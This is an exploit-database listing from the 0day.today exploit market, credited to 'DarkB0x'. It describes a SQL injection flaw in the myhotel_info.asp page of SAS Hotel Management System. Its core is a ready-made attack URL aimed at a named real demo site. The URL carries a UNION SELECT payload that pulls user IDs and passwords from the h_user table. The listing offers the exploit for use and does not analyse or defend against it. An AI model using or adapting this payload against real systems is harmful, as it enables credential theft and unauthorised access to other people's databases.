[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SAS Hotel Management System (myhotel_info.asp) SQL Injection Vuln

Author
DarkB0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4859
Category
web applications
Date add
16-02-2009
Platform
unsorted
=================================================================
SAS Hotel Management System (myhotel_info.asp) SQL Injection Vuln
=================================================================


#found by DarkB0x

#script           : SAS Hotel Management System
#download         : Null
#script home page : http://www.sellatsite.com/sellatsite/hotel.asp
#Demo             : http://www.aebest.com


#Exploits :

//*/

http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+h_user


#note : the injection's details are in page title ! xD


#  0day.today [2024-12-24]  #